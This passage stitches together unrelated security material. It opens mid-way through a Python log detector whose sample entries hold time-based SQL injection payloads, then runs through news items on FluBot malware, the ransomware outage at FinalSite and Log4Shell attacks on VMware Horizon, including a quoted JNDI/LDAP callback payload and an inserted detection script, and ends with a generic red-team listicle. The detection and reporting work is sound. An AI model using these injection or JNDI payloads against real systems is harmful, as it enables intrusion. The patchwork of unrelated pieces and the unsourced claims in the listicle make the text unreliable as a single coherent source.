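                "ip": m["ip"], "path": url.path, "param": key,
                "reasons": reasons, "seconds": round(seconds, 3),
                # Payload plus a matching delay means the probe actually worked.
                "confirmed": "time-delay function" in reasons
                             and seconds >= DELAY_THRESHOLD_S,
            }
    return None


def detect(lines):
    """Run inspect_line over an iterable of log lines, keeping only findings."""
    return [f for f in map(inspect_line, lines) if f]


SAMPLE_LOG = [
    # Ordinary admin browsing: fast and payload-free.
    '10.0.0.5 - - [05/Jan/2022:10:01:02 +0000] "GET /ovas/admin/?page=inquiries HTTP/1.1" 200 5120 118342',
    '10.0.0.5 - - [05/Jan/2022:10:01:09 +0000] "GET /ovas/admin/inquiries/view_details.php?id=1 HTTP/1.1" 200 2048 23411',
    # The advisory's Inquiries payload as a browser percent-encodes it; the response took 5.03 s.
    '10.0.0.5 - - [05/Jan/2022:10:01:15 +0000] "GET /ovas/admin/inquiries/view_details.php?id=1%27%20AND%20%28SELECT%206051%20FROM%20%28SELECT%28SLEEP%285%29%29%29DEds%29%20AND%20%27SOxP%27%3D%27SOxP HTTP/1.1" 200 2048 5031877',
    # The advisory's Category List payload, but the response came back in 31 ms:
    # an attempt worth alerting on, not a confirmed injection.
    '10.0.0.5 - - [05/Jan/2022:10:01:22 +0000] "GET /ovas/admin/categories/manage_category.php?id=2%27%20AND%20%28SELECT%203851%20FROM%20%28SELECT%28SLEEP%285%29%29%29UFXk%29%20AND%20%27XbFb%27%3D%27XbFb HTTP/1.1" 200 1900 31020',
    # A slow but legitimate request: no payload, so no finding.
    '10.0.0.7 - - [05/Jan/2022:10:02:01 +0000] "GET /ovas/admin/?page=appointments HTTP/1.1" 200 9000 4900000',
]

if __name__ == "__main__":
    for finding in detect(SAMPLE_LOG):
        print(finding)
```

Payloads sent in the multipart POST body (section 3 above) never reach an access log, so that endpoint needs application-level or WAF logging rather than this check.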

FluBot malware now targets Europe posing as Flash Player app


The widely distributed FluBot malware continues to evolve, with new campaigns distributing the malware as Flash Player and the developers adding new features.

FluBot is an Android banking trojan that steals credentials by displaying overlay login forms against many banks worldwide.

The smishing (SMS phishing) lures for its distribution include fake security updates, fake Adobe Flash Players, voicemail memos, and impersonated parcel delivery notices.

Once in the device, FluBot can steal online banking credentials, send or intercept SMS messages (and one-time passwords), and capture screenshots.

Because the malware uses the victim’s device to send new smishing messages to all their contacts, it usually spreads like wildfire.

FluBot spread process diagram
Source: F5 Labs

Impersonating Flash Player

MalwareHunterTeam told BleepingComputer that new FluBot campaigns are distributed using SMS texts asking the recipient if they intended to upload a video from their device.

An example of this campaign’s SMS text targeting Polish recipients was shared by CSIRT KNF, as seen below.

FluBot SMS text asking if the user uploaded a video
Source: CSIRT KNF

When recipients click on the included link, they are brought to a page offering a fake Flash Player APK [VirusTotal] that installs the FluBot malware on the Android device.

FluBot fake Flash Player attack chain
Source: CSIRT KNF

Android users should always avoid installing apps from APKs hosted at remote sites to protect themselves from malware. This practice is especially true for well-known brands, like Adobe, whose apps should only be installed from trusted locations.

New features observed in recent FluBot versions

The most recent major release is version 5.0, which came out in early December 2021, while version 5.2 saw the light only a few days ago.

With this release, the DGA (domain generation algorithm) system received much attention from the malware authors, as it’s vital in enabling the actors to operate unobstructed.

A DGA generates many new C2 domains on the fly, making mitigation measures such as DNS blocklists ineffective.

In its newest version, FluBot’s DGA uses 30 top-level domains instead of just three used previously and also features a command that enables attackers to change the seed remotely.

The function responsible for domain generation
Source: F5 Labs

On the communication side, the new FluBot now connects to the C2 through DNS tunnelling over HTTPS, whereas previously it used direct HTTPS connections on port 443.

The commands added to the malware in versions 5.0, 5.1, and 5.2 are the following:

  • Update DNS resolvers
  • Update the DGA seed remotely
  • Send longer SMS messages using multi-part division functions

Along with the above, the latest version of FluBot retains the capability to:

  • Open URLs on demand
  • Get the victim’s contact list
  • Uninstall existing apps
  • Disable Android Battery Optimization
  • Abuse Android Accessibility Service for screen grabbing and keylogging
  • Perform calls on demand
  • Disable Play Protect
  • Intercept and hide new SMS messages for stealing OTPs
  • Upload SMS with victim information to C2
  • Get list of apps to load the corresponding overlay injects

In summary, FluBot hasn’t deprecated any commands used in previous versions and only enriched its capabilities with new ones.

For more technical details on how exactly the latest version of FluBot works, check out the F5 Labs report.


How to stay safe from FluBot

Note that in many cases, a link to download FluBot will arrive on your device from one of your contacts, maybe even a friend or family member.

As such, if you receive an unusual SMS that contains a URL and urges you to click it, it’s likely a message generated by FluBot.

Finally, avoid installing APK files from unusual sources, regularly check that Google Play Protect is enabled on your Android device, and use a mobile security solution from a reputable vendor.


UK: NHS Warns of Hackers Exploiting Log4Shell


The UK’s National Health Service (NHS) has published a cyber alert warning of an unknown threat group targeting VMware Horizon deployments with Log4Shell exploits.

Log4Shell is an exploit for CVE-2021-44228, a critical remote code execution flaw in Apache Log4j 2.14, which has been under active and high-volume exploitation since December 2021.

Apache addressed the above and four more vulnerabilities via subsequent security updates, and Log4j version 2.17.1 is now considered adequately secure.

Hackers Targeting Apache Tomcat in VMware Horizon with Log4Shell

According to the NHS notice, the actor is leveraging the exploit to achieve remote code execution on vulnerable VMware Horizon deployments on public infrastructure.

This comes just two days after we reported that Microsoft issued a very similar warning that Log4j attacks remain rampant into 2022.


“The attack likely consists of a reconnaissance phase, where the attacker uses the Java Naming and Directory Interface (JNDI) via Log4Shell payloads to call back to malicious infrastructure,” explains the alert.

“Once a weakness has been identified, the attack then uses the Lightweight Directory Access Protocol (LDAP) to retrieve and execute a malicious Java class file that injects a web shell into the VM Blast Secure Gateway service.”

“The web shell can then be used by an attacker to carry out a number of malicious activities such as deploying additional malicious software, data exfiltration, or deployment of ransomware.”

The actor is taking advantage of the presence of the Apache Tomcat service embedded within VMware Horizon, which is vulnerable to Log4Shell.

The exploitation begins with the simple and widely used “${jndi:ldap://example.com}” payload and spawns the following PowerShell command from Tomcat.

PowerShell command spawned by Tomcat
Source: NHS

This command queries Win32 services to get the list of ‘VMBlastSG’ service names, retrieves their paths, modifies ‘absg-worker.js’ to drop a listener, and then restarts the service to activate the implant.

The listener is then responsible for executing arbitrary commands received via HTTP/HTTPS as header objects with a hardcoded string.

At this point, the actor has established persistent and stable communication with the C2 server and can perform data exfiltration, command execution, or deploy ransomware.

Attack flow diagram
Source: NHS

VMware Horizon is not the only VMware product targeted by threat actors using the Log4j vulnerability.

The Conti ransomware operation is also using Log4Shell to spread laterally to vulnerable VMware vCenter servers to more easily encrypt virtual machines.

Security updates are available

VMware released a security update for Horizon and other products last month, fixing CVE-2021-44228 and CVE-2021-45046 with versions 2111, 7.13.1, and 7.10.3.

As such, all VMware Horizon admins are urged to apply the security updates as soon as possible.

NHS’s report also highlights the following three signs of active exploitation on vulnerable systems:

  1. Evidence of ws_TomcatService.exe spawning abnormal processes
  2. Any powershell.exe processes containing ‘VMBlastSG’ in the command line
  3. File modifications to ‘…\VMware\VMware View\Server\appblastgateway\lib\absg-worker.js’ – This file is generally overwritten during upgrades and not modified
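The three signs above can be turned into a triage check over endpoint telemetry; what follows is an added example, not code from the NHS alert. It assumes Sysmon-style field names (Image, ParentImage, CommandLine, TargetFilename), constructed sample events with placeholder install paths, and an allowlist of normal Tomcat child processes that is itself a placeholder to tune per environment.

```python
"""
Added example, not from the NHS alert: apply the three signs of active
exploitation listed above to process-creation and file-modification events.
The events are constructed; field names (Image, ParentImage, CommandLine,
TargetFilename) follow the Sysmon convention, an assumption about the sensor.
"""
import ntpath

TOMCAT_IMAGE = "ws_tomcatservice.exe"
# Children ws_TomcatService.exe is allowed to spawn in this environment;
# anything else counts as "abnormal" for sign 1. Constructed allowlist: tune it.
EXPECTED_TOMCAT_CHILDREN = {"conhost.exe"}
# Tail of the path from sign 3 (the leading directories vary per install).
ABSG_WORKER_TAIL = r"\vmware\vmware view\server\appblastgateway\lib\absg-worker.js"

def _name(path: str) -> str:
    return ntpath.basename(path).lower()  # handles both \ and / separators

def check_process_event(ev: dict) -> list:
    """Signs matched by one process-creation event."""
    hits = []
    parent, image = _name(ev.get("ParentImage", "")), _name(ev.get("Image", ""))
    cmdline = ev.get("CommandLine", "").lower()
    # Sign 1: ws_TomcatService.exe spawning something outside the allowlist.
    if parent == TOMCAT_IMAGE and image not in EXPECTED_TOMCAT_CHILDREN:
        hits.append("sign1_tomcat_abnormal_child")
    # Sign 2: powershell.exe with 'VMBlastSG' in its command line
    # (pwsh.exe added here as a generalisation beyond the alert).
    if image in ("powershell.exe", "pwsh.exe") and "vmblastsg" in cmdline:
        hits.append("sign2_powershell_vmblastsg")
    return hits

def check_file_event(ev: dict) -> list:
    """Sign 3: any write to absg-worker.js outside an upgrade window."""
    target = ev.get("TargetFilename", "").lower().replace("/", "\\")
    return ["sign3_absg_worker_modified"] if target.endswith(ABSG_WORKER_TAIL) else []

def triage(events: list) -> list:
    """Return (event id, sign) pairs for every event that matches a sign."""
    hits = []
    for ev in events:
        signs = check_process_event(ev) if ev.get("EventType") == "ProcessCreate" else check_file_event(ev)
        hits.extend((ev["Id"], s) for s in signs)
    return hits

# Constructed events mirroring the sequence described above: Tomcat spawns
# PowerShell that touches the VMBlastSG service, then absg-worker.js changes.
SAMPLE_EVENTS = [
    {"Id": 1, "EventType": "ProcessCreate",
     "ParentImage": r"C:\Program Files\VMware\VMware View\Server\bin\ws_TomcatService.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -Command Get-Service -Name VMBlastSG"},
    {"Id": 2, "EventType": "FileCreate",
     "TargetFilename": r"C:\Program Files\VMware\VMware View\Server\appblastgateway\lib\absg-worker.js"},
    {"Id": 3, "EventType": "ProcessCreate",          # benign: allowlisted child
     "ParentImage": r"C:\Program Files\VMware\VMware View\Server\bin\ws_TomcatService.exe",
     "Image": r"C:\Windows\System32\conhost.exe", "CommandLine": "conhost.exe 0x4"},
    {"Id": 4, "EventType": "FileCreate",             # benign: unrelated file
     "TargetFilename": r"C:\Program Files\VMware\VMware View\Server\logs\absg.log"},
]

def run_sample() -> list:
    return triage(SAMPLE_EVENTS)
```

Sign 3 fires on legitimate upgrades as well, so correlate an absg-worker.js write with change records before treating it alone as confirmed compromise.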


Ransomware Attack Shuts Down Thousands Of School Websites


FinalSite Disrupted by Ransomware – Attack Shuts Down Thousands of School Websites

FinalSite, a leading school website services provider, has suffered a ransomware attack disrupting access to websites for thousands of schools worldwide.

FinalSite is a software as a service (SaaS) provider that offers website design, hosting, and content management solutions for K-12 school districts and universities. FinalSite claims to provide solutions for over 8,000 schools and universities across 115 different countries.

On Tuesday, school districts that hosted their websites with FinalSite found that they were no longer reachable or were displaying errors.

At the time, FinalSite did not disclose that they had suffered an attack but simply said that they were experiencing errors and “performance issues” across various services, mostly affecting their Composer content management system.

“This impact may include, but is not limited to, Groups Manager, Constituent Manager, Login, Forms Manager (old), Registration Manager, Directory Elements, Athletics Manager, Calendar Manager,” reads the FinalSite status page.

A school IT administrator told BleepingComputer that FinalSite did not provide them with a time frame for when services would be restored, and that they were forced to send emails to parents alerting them of the outage.

“Our website is currently down due to an issue that our service provider is experiencing. We apologize for any inconvenience this may cause you,” read an example outage email shared with BleepingComputer.

In addition to the website outages, a system administrator shared on Reddit that the attack prevented schools from sending closure notifications due to weather or COVID-19.

“Many districts are complaining that they are unable to use their emergency notification system to warn their communities about closures due to weather or COVID-19 protocol,” explained the Reddit post.

Outages caused by a ransomware attack

After three days of disruption, FinalSite confirmed today that a ransomware attack on their network is causing the outages.

“We are incredibly sorry for this prolonged outage and fully realize the stress it is causing your organizations. While we have made progress overnight to get all websites up and running, full restoration has taken us longer than anticipated,” FinalSite apologized in a status update today.

“The Finalsite security team monitors our network systems 24 hours a day, seven days a week. On Tuesday, January 4, our team identified the presence of ransomware on certain systems in our environment.”

“We immediately took steps to secure our systems and to contain the activity. We quickly launched an investigation into the event with the assistance of third-party forensic specialists, and began proactively taking certain systems offline.”

However, in a template created by FinalSite that schools can send to parents, there is no mention of the ransomware attack, and just that FinalSite is experiencing a “disruption of certain computer systems on its network.”

Morgan Delack, the Director of Communications for FinalSite, told BleepingComputer that they proactively shut down their IT systems to prevent the spread of the attack, which led to approximately 5,000 school websites going offline.

“It’s important to note that the malware did not shut down our systems – we proactively did so immediately upon learning of what happened in order to protect and secure our data. In doing so, we took approximately 5,000 school websites offline in order to rebuild them in a new, safe environment,” Delack shared in a statement.

While Delack could not share the name of the ransomware operation due to ongoing investigations, BleepingComputer was told that there is no evidence of data being compromised, and they are continuing to investigate with a third-party cybersecurity firm.

As most enterprise-targeting ransomware operations steal data before encrypting, we will likely learn in a future update whether data was accessed.


Education is a popular target

School districts and universities have become a popular target for ransomware operations over the years.

This is especially true for K-12 school districts, which have very limited funding and thus tend to have smaller support teams and less security infrastructure to detect imminent attacks.

“While school districts may not be flush with cash, the fact is that many carry cyber insurance and so can afford to pay demands – and that puts them in the crosshairs”, Emsisoft threat analyst Brett Callow told BleepingComputer.

“Last year, 87 incidents disrupted learning at as many as 1,043 individual schools. In 2020, 84 incidents disrupted learning at 1,681 schools. The fact that the average size of the impacted districts has decreased could indicate a correlation between budget size and (in)security level.”

“The bigger the district, the bigger the security budget and the better the security that’s in place.”


7+ Major Reasons to Hire a Red Team to Harden Your App Sec


Application Security and Red Teams

The growing cyberthreat landscape has brought a storm to the online marketplace. According to online studies and research, around 500 million ransomware attacks were attempted in 2021. These numbers keep growing day by day, and if businesses haven’t strategized yet, nothing can save them.

Hackers always have their evil eyes on websites and finances. It has now become vital for businesses to have the right protocols, policies and procedures in place to keep their data secure and strengthen their infrastructure, making them resilient. With this in mind, companies have shown growing interest in hiring red teams, which identify the company’s susceptibility to attack by testing its systems and networks before an attacker does.

Do you know what a red team is? Have you ever heard of one? If not, read this article. Here we’ll discuss what a red team is and the benefits of hiring one. So, let’s jump in.

What is a Red Team?

A red team is a group of ethical hackers that helps the company to test its system security. This group will identify weaknesses in the company’s web applications and networks, which the same team can later remediate.


They’ll try to penetrate the systems just like the hackers do and find the loopholes. The red teaming process will help you understand your actual security posture and how well your security controls are working.

Why should you hire a red team?

There are several reasons that will make your company want to hire a red team. This team will help you find the loopholes in your system and also help make your system more secure. Here are some of the compelling reasons to hire a red team. Take a look.

1. Detection of Software Bugs

The ethical hackers will work on the mission to find out all existing bugs in your software security. They identify threats and vulnerabilities before cybercriminals can exploit them. The red team will reduce the cost of managing associated risks by finding these bugs.

For example, if you use particular software to manage your passwords, the hackers will exploit it. Thus, the red team will find loopholes and report them to you. It will give you a chance to fix these bugs before the hackers can take advantage of them.

2. Improved Cybersecurity

When you have a red team in your organization, it helps you improve your cybersecurity posture. The team will identify all the weaknesses in your security and help you patch them up. Thus, it becomes difficult for hackers to penetrate your systems.

An excellent example of this is Equifax’s attack in 2017. The company had failed to patch up a known vulnerability in one of its systems. As a result, hackers could steal the personal information of more than 143 million people. If Equifax had a red team, it could have identified and patched the vulnerability before the attack.

3. Risk Mitigation

According to Gartner, “The use of a red team in an ethical hacking program has the potential to reduce the probability and impact of future cyberattacks by identifying security vulnerabilities in IT systems before attackers can exploit them.”

Red teams are capable of assessing your system’s exposure level to different security threats. It helps the company to identify what needs to be fixed immediately and what can be done in a phased manner.

4. Identify Technical Improvements

Red teams help organizations understand their technical vulnerabilities and identify areas of improvement. The team uses assessment frameworks such as NIST, OWASP, etc., to assess application security.

Once the vulnerabilities are identified, the red team will work with the organization’s developers to fix them. It will help improve the overall security of the applications and make them less prone to cyberattacks.

For example, if your organization uses an outdated version of the software, the red team will identify it and suggest you update it. It’ll help in fixing the known vulnerabilities present in that software.

5. Assessment of Third-Party Vendors

Organizations nowadays rely on third-party vendors to run their business operations. This, however, makes them more vulnerable to cyberattacks. A hacker can easily penetrate the third-party vendor’s systems and steal the data.

Red teams help organizations in assessing the security posture of their third-party vendors. They look for vulnerabilities in the vendor’s system and check if any malware is present. It’ll help you to take necessary measures to secure your systems before a significant security breach occurs.

For example, if your organization uses a cloud-based storage solution, the red team will test it for vulnerabilities. If they find any, they’ll report it to you and suggest you take appropriate action.

6. Testing of Emergency Response Plans

It is difficult for organizations to test their emergency response plans, as doing so may hamper their day-to-day operations. However, red teams can help you test these plans without interrupting your everyday operations.

The team will first identify the vulnerabilities which need to be tested and then test them. They’ll provide a report on whether your plan is strong enough or not. If it’s not, they’ll suggest ways of strengthening it.

For example, let’s say your organization plans to deal with a ransomware attack. The red team will test it by infecting one of its systems with ransomware. They’ll then check if the organization could effectively contain the infection and recover the data.

7. Helps in Building a Cybersecurity Culture

An organization needs to have a cybersecurity culture to be secure against cyberattacks. Red teams can help build this culture by training the employees to identify and respond to security threats.

The team will first identify the weaknesses in your security and help you patch them up. They’ll then train your employees on identifying different types of security threats before they are executed. It’ll help them secure their systems and minimize the impact of cyberattacks.

For example, suppose your organization is storing its data in the cloud. In that case, the red team will first check how securely it’s stored and then train your employees to identify and report suspicious activity.

8. Testing the Effectiveness of Disaster Recovery Plan

It is difficult for organizations to test their disaster recovery plans, especially when doing so means taking down an entire system. Red teams can help test these plans without disrupting everyday activities.

The team will first identify what needs to be tested and then do it without interrupting your regular operations. They’ll then provide a report on the effectiveness of your plan and whether it can live up to your expectations or not.

For example, let’s say your organization has a disaster recovery plan that involves restoring one of its systems from backup. The red team first tests if that system is recoverable, following which they send simulated alerts to the organization. They then check if the organization could respond to the warnings and recover the system successfully.

Conclusion

Red teams are a vital part of any organization’s cybersecurity strategy. They help identify the vulnerabilities in your system and suggest ways of fixing them. They also help in building a cybersecurity culture within your organization. So, if you’re not using a red team yet, it’s time to consider doing so!
